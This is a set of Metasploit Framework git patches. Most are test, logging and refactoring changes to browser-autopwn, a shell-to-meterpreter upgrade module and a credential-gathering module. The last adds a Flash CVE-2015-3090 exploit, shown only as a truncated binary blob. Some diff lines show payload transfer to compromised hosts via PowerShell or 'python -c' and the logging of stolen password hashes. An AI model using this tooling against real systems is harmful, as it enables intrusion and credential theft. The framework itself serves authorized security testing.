+        next unless p
         p.datastore['LHOST'] = get_payload_lhost
         p.datastore['LPORT'] = get_selected_payload_lport(platform)
-        next unless p
         p_opt = Serializer::ReadableText.dump_options(p, '   ')
         print("\nPayload options (#{payload_name}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0)
       end
diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index 8d0ea39a78..1d003816f6 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -25,7 +25,6 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     allow(subject).to receive(:framework).and_return(framework)
   end
 
-
   def mock_report_note(arg)
     framework = double('Msf::Framework', datastore: {})
     notes = [create_fake_note('bap.clicks')]
@@ -59,6 +58,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
 
   def create_fake_exploit(opts={})
     full_name         = opts[:full_name]
+    short_name        = opts[:short_name]
     rank              = opts[:rank]            || 400
     disclosure_date   = opts[:disclosure_date] || 'Dec 21 2014'
     compat_payloads   = opts[:compat_payloads] || []
@@ -76,6 +76,9 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     allow(mod).to receive(:datastore).and_return(datastore_options)
     allow(mod).to receive(:job_id).and_return(job_id)
     allow(mod).to receive(:exploit_simple)
+    allow(mod).to receive(:vprint_status)
+    allow(mod).to receive(:shortname).and_return(short_name)
+    mod.instance_variable_set(:@requirements, requirements)
 
     mod
   end
@@ -87,10 +90,11 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
 
     create_fake_exploit(
       full_name: 'windows/browser/ms14_064_ole_code_execution',
+      short_name: 'ms14_064_ole_code_execution',
       rank: 600,
       disclosure_date: 'Nov 13 2014',
       compat_payloads: compat_payloads,
-      datastore_options: {'URI'=>'/ms14_064'},
+      datastore_options: {'URIPATH'=>'/ms14_64'},
       job_id: 0,
       requirements: {os_name: windows_81_regex}
     )
@@ -104,12 +108,13 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
 
     create_fake_exploit(
       full_name: 'multi/browser/adobe_flash_net_connection_confusion',
+      short_name: 'adobe_flash_net_connection_confusion',
       rank: 500,
       disclosure_date: 'Mar 12 2015',
       compat_payloads: compat_payloads,
-      datastore_options: {'URI'=>'/flash1'},
+      datastore_options: {'URIPATH'=>'/flash1'},
       job_id: 1,
-      requirements: {os_name: windows_81_regex}
+      requirements: {os_name: lambda { |ver| ver == '16.0.0.305' }}
     )
   end
 
@@ -118,12 +123,13 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
 
     create_fake_exploit(
       full_name: 'multi/browser/adobe_flash_uncompress_zlib_uaf',
+      short_name: 'adobe_flash_uncompress_zlib_uaf',
       rank: 500,
       disclosure_date: 'Apr 28 2014',
       compat_payloads: compat_payloads,
-      datastore_options: {'URI'=>'/flash2'},
+      datastore_options: {'URIPATH'=>'/flash2'},
       job_id: 2,
-      requirements: {os_name: windows_81_regex}
+      requirements: {os_name: lambda { |ver| ver == '16.0.0.287' }}
     )
   end
 
@@ -175,6 +181,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   end
 
   def mock_payload_create(full_name)
+    full_name.gsub!(/^firefox/, 'generic')
     available_payloads.each do |p|
       return p if p.fullname == full_name
     end
@@ -202,6 +209,16 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     /^(?:Microsoft )?Windows 8\.1/
   end
 
+  let(:job_ids) do
+    ids = []
+
+    subject.framework.jobs.each do |job|
+      ids << job.first.to_i
+    end
+
+    ids
+  end
+
   let(:available_exploits) do
     @exploits ||= lambda {
       exploits = []
@@ -241,6 +258,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
       'SRVPORT'               => 8080,
       'MaxExploits'           => 20,
       'LHOST'                 => '127.0.0.1',
+      'SSL'                   => false,
       'MaxSessions'           => -1,
       'Custom404'             => 'http://example.com',
       'PAYLOAD_ANDROID'       => 'android/meterpreter/reverse_tcp',
@@ -292,6 +310,17 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     MessagePack.unpack(profile_packed_data).keys.first.split('.')[0,3] * "."
   end
 
+  let(:cli) do
+    c = double('cli')
+    allow(c).to receive(:peerhost).and_return('127.0.0.1')
+    c
+  end
+
+  let(:cli_req) do
+    req = Rex::Proto::Http::Request.new
+    req.headers['Cookie'] = "__ua=#{profile_tag}"
+    req
+  end
 
   before(:each) do
     framework = double('Msf::Framework', datastore: {})
@@ -325,6 +354,8 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     allow(payloads).to receive(:create) { |arg| mock_payload_create(arg) }
     allow(framework).to receive(:payloads).and_return(payloads)
 
+    allow_any_instance_of(described_class).to receive(:cli).and_return(cli)
+
     allow_any_instance_of(described_class).to receive(:framework).and_return(framework)
     allow_any_instance_of(described_class).to receive(:report_note) { |arg| mock_report_note(arg) }
   end
@@ -378,16 +409,6 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   end
 
   context 'when removing jobs' do
-    let(:job_ids) do
-      ids = []
-
-      subject.framework.jobs.each do |job|
-        ids << job.first.to_i
-      end
-
-      ids
-    end
-
     describe '#rm_exploit_jobs' do
       before(:each) do
         subject.instance_variable_set(:@exploit_job_ids, job_ids)
@@ -401,11 +422,8 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
 
     describe '#rm_payload_jobs' do
-      before(:each) do
-        subject.instance_variable_set(:@payload_job_ids, job_ids)
-      end
-
       it 'empties jobs' do
+        subject.instance_variable_set(:@payload_job_ids, job_ids)
         expect(subject.framework.jobs.length).to eq(1)
         subject.rm_payload_jobs
         expect(subject.framework.jobs).to be_empty
@@ -661,16 +679,88 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  describe '#show_ready_exploits' do
-  end
+  describe 'when outputing' do
 
-  describe '#start_service' do
-  end
+    # Get stdout:
+    # http://stackoverflow.com/questions/11349270/test-output-to-command-line-with-rspec
+    def get_stdout(&block)
+      out = $stdout
+      $stdout = fake = StringIO.new
+      begin
+        yield
+      ensure
+        $stdout = out
+      end
+      fake.string
+    end
 
-  describe '#show_payloads' do
-  end
+    before(:each) do
+      allow(subject).to receive(:print_status) { |arg| $stdout.puts arg }
+      allow(subject).to receive(:print_line) { |arg| $stdout.puts arg }
+      allow(subject).to receive(:print) { |arg| $stdout.puts arg }
+      allow(subject).to receive(:set_exploit_options)
+      subject.instance_variable_set(:@bap_exploits, [])
+      subject.init_exploits
+    end
 
-  describe '#set_payload' do
+    describe '#show_ready_exploits' do
+
+      let(:output) { get_stdout { subject.show_ready_exploits } }
+
+      context 'when there is ms14_064_ole_code_execution available' do
+        it 'shows ms14_064_ole_code_execution on the table' do
+          expect(output).to include('ms14_064_ole_code_execution')
+        end
+      end
+
+      context 'when there is adobe_flash_uncompress_zlib_uaf available' do
+        it 'shows adobe_flash_uncompress_zlib_uaf' do
+          expect(output).to include('adobe_flash_uncompress_zlib_uaf')
+        end
+      end
+
+      context 'when there is adobe_flash_net_connection_confusion available' do
+        it 'shows adobe_flash_net_connection_confusion' do
+          expect(output).to include('adobe_flash_net_connection_confusion')
+        end
+      end
+    end
+
+    skip '#start_service' do
+      # You got me, I don't know how to implement this one because the super"
+    end
+
+    describe '#show_payloads' do
+      it 'shows payloads' do
+        output = get_stdout { subject.show_payloads }
+        expect(output).to include(windows_meterpreter_reverse_tcp)
+        expect(output).to include(linux_meterpreter_reverse_tcp)
+      end
+    end
+
+    describe '#show_real_list' do
+      before(:each) do
+        allow(subject).to receive(:set_exploit_options)
+        subject.instance_variable_set(:@bap_exploits, [])
+        subject.init_exploits
+        allow(subject).to receive(:retrieve_tag)
+        unpacked_profile = MessagePack.unpack(profile_packed_data)
+        allow(subject).to receive(:get_profile_info).and_return(unpacked_profile)
+      end
+
+      it 'shows exploits' do
+        suitable_exploits = subject.get_suitable_exploits(cli, cli_req)
+        output = get_stdout { subject.show_real_list('127.0.0.1', profile_tag, suitable_exploits) }
+        expect(output).to include('ms14_064_ole_code_execution')
+      end
+    end
+
+    describe '#set_payload' do
+      it 'shows set_payload' do
+        output = get_stdout { subject.set_payload }
+        expect(output).to include('\'set payload\' has been disabled for BrowserAutoPwn')
+      end
+    end
   end
 
   describe '#get_suitable_exploits' do
@@ -679,7 +769,16 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
       subject.instance_variable_set(:@bap_exploits, [])
       subject.init_exploits
       allow(subject).to receive(:retrieve_tag)
-      allow(subject).to receive(:get_profile_info)
+      unpacked_profile = MessagePack.unpack(profile_packed_data)
+      allow(subject).to receive(:get_profile_info).and_return(unpacked_profile)
+    end
+
+    context 'when client is Windows' do
+      it 'returns ms14_064' do
+        suitable_exploits = subject.get_suitable_exploits(cli, cli_req)
+        expect(suitable_exploits.length).to eq(1)
+        expect(suitable_exploits.first.fullname).to eq('windows/browser/ms14_064_ole_code_execution')
+      end
     end
   end
 
@@ -694,19 +793,32 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  describe '#show_real_list' do
-  end
-
   describe '#get_exploit_urls' do
-  end
-
-  describe '#on_request_uri' do
+    context 'when ms14_064 is on the list' do
+      it 'returns the URL for ms14_064' do
+        ms14_064 = create_fake_ms14_064
+        allow(subject).to receive(:get_suitable_exploits).and_return([ms14_064])
+        expect(subject.get_exploit_urls(cli, cli_req).first).to include(ms14_064.datastore['URIPATH'])
+      end
+    end
   end
 
   describe '#is_ip_targeted?' do
-  end
+    let(:ip) { '1.2.3.4' }
 
-  describe '#session_count' do
+    context 'when IP 1.2.3.4 is on the whitelist' do
+      it 'returns true' do
+        subject.instance_variable_set(:@whitelist, [ip])
+        expect(subject.is_ip_targeted?(ip)).to be_truthy
+      end
+    end
+
+    context 'when IP 1.2.3.4 is not on the whitelist' do
+      it 'returns false' do
+        subject.instance_variable_set(:@whitelist, [])
+        expect(subject.is_ip_targeted?(ip)).to be_falsey
+      end
+    end
   end
 
   describe '#get_custom_404_url' do
@@ -716,6 +828,34 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   end
 
   describe '#build_html' do
+    before(:each) do
+      ms14_064 = create_fake_ms14_064
+      allow(subject).to receive(:get_suitable_exploits).and_return([ms14_064])
+      url_list = subject.get_exploit_urls(cli, cli_req)
+      allow(subject).to receive(:get_exploit_urls).and_return(url_list)
+    end
+
+    let(:html) do
+      subject.build_html(cli, cli_req)
+    end
+
+    context 'it returns javascript functions' do
+      it 'contains the setElementStyle function' do
+        expect(html).to match(/function setElementStyle/)
+      end
+
+      it 'contains the moveIframe function' do
+        expect(html).to match(/function moveIframe/)
+      end
+
+      it 'contains the onload function' do
+        expect(html).to match(/window\.onload = function/)
+      end
+
+      it 'contains the loadExploit function' do
+        expect(html).to match(/function loadExploit/)
+      end
+    end
   end
 
 end
\ No newline at end of file

From e549580ad25c84176486794c7881db1d76b777b2 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 18 Jun 2015 00:40:47 -0500
Subject: [PATCH 0442/1013] Linux doesn't like the uppercase

---
 lib/msf/core/exploit/browser_autopwnv2.rb              | 2 +-
 lib/msf/core/exploit/remote/browser_profile_manager.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 6363c3e759..31ac710b3f 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -6,7 +6,7 @@
 #
 ###
 
-require 'Date'
+require 'date'
 
 module Msf
   module Exploit::Remote::BrowserAutopwnv2
diff --git a/lib/msf/core/exploit/remote/browser_profile_manager.rb b/lib/msf/core/exploit/remote/browser_profile_manager.rb
index c834d4a5a4..5e571ec6fe 100644
--- a/lib/msf/core/exploit/remote/browser_profile_manager.rb
+++ b/lib/msf/core/exploit/remote/browser_profile_manager.rb
@@ -1,4 +1,4 @@
-require 'Msgpack'
+require 'msgpack'
 
 module Msf
   module Exploit::Remote::BrowserProfileManager

From ce9481d2b717c53cf9f32a18fab9110e258c5459 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Thu, 18 Jun 2015 09:27:01 +0100
Subject: [PATCH 0443/1013] Inconstancy - If datastore['VERBOSE'] vs vprint

---
 lib/msf/core/exploit/dhcp.rb                  |  4 +--
 lib/msf/core/exploit/tftp.rb                  |  4 +--
 modules/auxiliary/spoof/replay/pcap_replay.rb |  2 +-
 .../multi/http/jboss_invoke_deploy.rb         |  6 ++---
 .../post/multi/manage/shell_to_meterpreter.rb | 26 +++++++++----------
 .../windows/gather/credentials/spark_im.rb    |  2 +-
 6 files changed, 22 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/exploit/dhcp.rb b/lib/msf/core/exploit/dhcp.rb
index c179a747f2..4c149c2559 100644
--- a/lib/msf/core/exploit/dhcp.rb
+++ b/lib/msf/core/exploit/dhcp.rb
@@ -36,14 +36,14 @@ module Exploit::DHCPServer
 
   def start_service(hash = {}, context = {})
     @dhcp = Rex::Proto::DHCP::Server.new(hash, context)
-    print_status("Starting DHCP server") if datastore['VERBOSE']
+    vprint_status("Starting DHCP server")
     @dhcp.start
     add_socket(@dhcp.sock)
     @dhcp
   end
 
   def stop_service
-    print_status("Stopping DHCP server") if datastore['VERBOSE']
+    vprint_status("Stopping DHCP server")
     @dhcp.stop
   end
 
diff --git a/lib/msf/core/exploit/tftp.rb b/lib/msf/core/exploit/tftp.rb
index 18c07836c9..43aff8e33c 100644
--- a/lib/msf/core/exploit/tftp.rb
+++ b/lib/msf/core/exploit/tftp.rb
@@ -20,14 +20,14 @@ module Exploit::TFTPServer
   def start_service(tag, exe)
     @tftp = Rex::Proto::TFTP::Server.new
     @tftp.register_file(tag, exe)
-    print_status("Starting TFTP server to host \"#{tag}\" (#{exe.length} bytes)") if datastore['VERBOSE']
+    vprint_status("Starting TFTP server to host \"#{tag}\" (#{exe.length} bytes)")
     @tftp.start
     add_socket(@tftp.sock)
     @tftp
   end
 
   def stop_service
-    print_status("Stopping TFTP server") if datastore['VERBOSE']
+    vprint_status("Stopping TFTP server")
     @tftp.stop
   end
 
diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb
index e762123863..c2a8526b1b 100644
--- a/modules/auxiliary/spoof/replay/pcap_replay.rb
+++ b/modules/auxiliary/spoof/replay/pcap_replay.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
     open_pcap
     print_status("Sending file...") unless verbose
     while (loop > 0 or infinity) do
-      vprint_status("Sending file (loop : #{count = count + 1})")
+      vprint_status("Sending file (loop: #{count = count + 1})")
       inject_pcap(filename, file_filter, pkt_delay )
       loop -= 1 unless infinity
       Kernel.select(nil, nil, nil, (delay * 1.0)/1000) if loop > 0 or infinity
diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb
index 89f6fbabdb..27d59c4c20 100644
--- a/modules/exploits/multi/http/jboss_invoke_deploy.rb
+++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb
@@ -102,7 +102,7 @@ class Metasploit4 < Msf::Exploit::Remote
     return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_4_/
     return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/
 
-    if res.body =~ /ServletException/	# Simple check, if we caused an exception.
+    if res.body =~ /ServletException/   # Simple check, if we caused an exception.
       vprint_status('Target seems vulnerable, but the used JBoss version is not supported by this exploit')
       return Exploit::CheckCode::Appears
     end
@@ -302,13 +302,13 @@ EOT
       elsif res.code < 200 || res.code >= 300
         msg = "http request failed to #{uri} [#{res.code}]"
       elsif res.code == 200
-        print_status("Successfully called '#{uri}'") if datastore['VERBOSE']
+        vprint_status("Successfully called '#{uri}'")
         return res
       end
 
       if attempt < num_attempts - 1
         msg << ', retrying in 5 seconds...'
-        print_status(msg) if datastore['VERBOSE']
+        vprint_status(msg)
         select(nil, nil, nil, 5)
       else
         print_error(msg)
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index 401063598b..4874b403a3 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -78,15 +78,15 @@ class Metasploit3 < Msf::Post
       lplat = [Msf::Platform::Windows]
       larch = [ARCH_X86]
       psh_arch = 'x86'
-      print_status("Platform: Windows") if datastore['VERBOSE']
+      vprint_status("Platform: Windows")
     when /osx/i
       platform = 'python'
       payload_name = 'python/meterpreter/reverse_tcp'
-      print_status("Platform: OS X") if datastore['VERBOSE']
+      vprint_status("Platform: OS X")
     when /solaris/i
       platform = 'python'
       payload_name = 'python/meterpreter/reverse_tcp'
-      print_status("Platform: Solaris") if datastore['VERBOSE']
+      vprint_status("Platform: Solaris")
     else
       # Find the best fit, be specific with uname to avoid matching hostname or something else
       target_info = cmd_exec('uname -mo')
@@ -96,16 +96,16 @@ class Metasploit3 < Msf::Post
         payload_name = 'linux/x86/meterpreter/reverse_tcp'
         lplat = [Msf::Platform::Linux]
         larch = [ARCH_X86]
-        print_status("Platform: Linux") if datastore['VERBOSE']
+        vprint_status("Platform: Linux")
       elsif cmd_exec('python -V') =~ /Python (2|3)\.(\d)/
         # Generic fallback for OSX, Solaris, Linux/ARM
         platform = 'python'
         payload_name = 'python/meterpreter/reverse_tcp'
-        print_status("Platform: Python [fallback]") if datastore['VERBOSE']
+        vprint_status("Platform: Python [fallback]")
       end
     end
     payload_name = datastore['PAYLOAD_OVERWRITE'] if datastore['PAYLOAD_OVERWRITE']
-    print_status("Upgrade payload: #{payload_name}") if datastore['VERBOSE']
+    vprint_status("Upgrade payload: #{payload_name}")
 
     if platform.blank?
       print_error("Shells on the the target platform, #{session.platform}, cannot be upgraded to Meterpreter at this time.")
@@ -129,26 +129,26 @@ class Metasploit3 < Msf::Post
     case platform
     when 'win'
       if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
-        print_status("Transfer method: Powershell") if datastore['VERBOSE']
+        vprint_status("Transfer method: Powershell")
         psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
         cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
       else
         print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
-        print_status("Transfer method: VBS [fallback]") if datastore['VERBOSE']
+        vprint_status("Transfer method: VBS [fallback]")
         exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
         aborted = transmit_payload(exe)
       end
     when 'python'
-      print_status("Transfer method: Python") if datastore['VERBOSE']
+      vprint_status("Transfer method: Python")
       cmd_exec("python -c \"#{payload_data}\"")
     else
-      print_status("Transfer method: Bourne shell [fallback]") if datastore['VERBOSE']
+      vprint_status("Transfer method: Bourne shell [fallback]")
       exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
       aborted = transmit_payload(exe)
     end
 
     if datastore['HANDLER']
-      print_status("Cleaning up handler") if datastore['VERBOSE']
+      vprint_status("Cleaning up handler")
       cleanup_handler(listener_job_id, aborted)
     end
     return nil
@@ -188,7 +188,7 @@ class Metasploit3 < Msf::Post
     total_bytes = 0
     cmds.each { |cmd| total_bytes += cmd.length }
 
-    print_status("Starting transfer...") if datastore['VERBOSE']
+    vprint_status("Starting transfer...")
     begin
       #
       # Run the commands one at a time
@@ -230,7 +230,7 @@ class Metasploit3 < Msf::Post
     framework.threads.spawn('ShellToMeterpreterUpgradeCleanup', false) {
       if !aborted
         timer = 0
-        print_status("Waiting up to #{HANDLE_TIMEOUT} seconds for the session to come back") if datastore['VERBOSE']
+        vprint_status("Waiting up to #{HANDLE_TIMEOUT} seconds for the session to come back")
         while !framework.jobs[listener_job_id].nil? && timer < HANDLE_TIMEOUT
           sleep(1)
           timer += 1
diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb
index b766c6c34e..c3461846d4 100644
--- a/modules/post/windows/gather/credentials/spark_im.rb
+++ b/modules/post/windows/gather/credentials/spark_im.rb
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
           end
 
           hash = pass.split("password").join.chomp
-          print_status("Spark password hash: #{hash}") if datastore['VERBOSE']
+          vprint_status("Spark password hash: #{hash}")
 
           # call method to decrypt hash
           decrypt(hash)

From 7f27fd0cf2c4ccbd9612e39a85c4fdcece4935ff Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Thu, 4 Jun 2015 09:35:58 -0500
Subject: [PATCH 0444/1013] adjust for user name size changes

---
 lib/metasploit/framework/ntds/account.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index f5f5a6e2d9..d47a6507cc 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -6,7 +6,7 @@ module Metasploit
       class Account
 
         # Size of an NTDS Account Struct on the Wire
-        ACCOUNT_SIZE = 2908
+        ACCOUNT_SIZE = 3016
         # Size of a Date or Time Format String on the Wire
         DATE_TIME_STRING_SIZE = 30
         # Size of the AccountDescription Field
@@ -16,7 +16,7 @@ module Metasploit
         # Size of a Hash String
         HASH_SIZE = 33
         # Size of the samAccountName field
-        NAME_SIZE = 20
+        NAME_SIZE = 128
 
         #@return [String] The AD Account Description
         attr_accessor :description

From de1542e5898419a1ef135d0618ae9687a0ad8e02 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 18 Jun 2015 12:36:14 -0500
Subject: [PATCH 0445/1013] Add module for CVE-2015-3090

---
 data/exploits/CVE-2015-3090/msf.swf           | Bin 0 -> 21164 bytes
 external/source/exploits/CVE-2015-3090/Elf.as | 235 +++++++++++
 .../source/exploits/CVE-2015-3090/Exploit.as  | 102 +++++
 .../CVE-2015-3090/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2015-3090/ExploitVector.as   |  74 ++++
 .../exploits/CVE-2015-3090/Exploiter.as       | 399 ++++++++++++++++++
 .../source/exploits/CVE-2015-3090/Logger.as   |  32 ++
 external/source/exploits/CVE-2015-3090/PE.as  |  72 ++++
 .../source/exploits/CVE-2015-3090/exploit.pbj | Bin 0 -> 420 bytes
 .../adobe_flash_shader_job_overflow.rb        | 150 +++++++
 10 files changed, 1149 insertions(+)
 create mode 100644 data/exploits/CVE-2015-3090/msf.swf
 create mode 100644 external/source/exploits/CVE-2015-3090/Elf.as
 create mode 100755 external/source/exploits/CVE-2015-3090/Exploit.as
 create mode 100644 external/source/exploits/CVE-2015-3090/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2015-3090/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2015-3090/Exploiter.as
 create mode 100644 external/source/exploits/CVE-2015-3090/Logger.as
 create mode 100644 external/source/exploits/CVE-2015-3090/PE.as
 create mode 100755 external/source/exploits/CVE-2015-3090/exploit.pbj
 create mode 100644 modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb

diff --git a/data/exploits/CVE-2015-3090/msf.swf b/data/exploits/CVE-2015-3090/msf.swf
new file mode 100644
index 0000000000000000000000000000000000000000..ec4c95a9d5d185f0e04176551bc98e32239c3d00
GIT binary patch
literal 21164
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
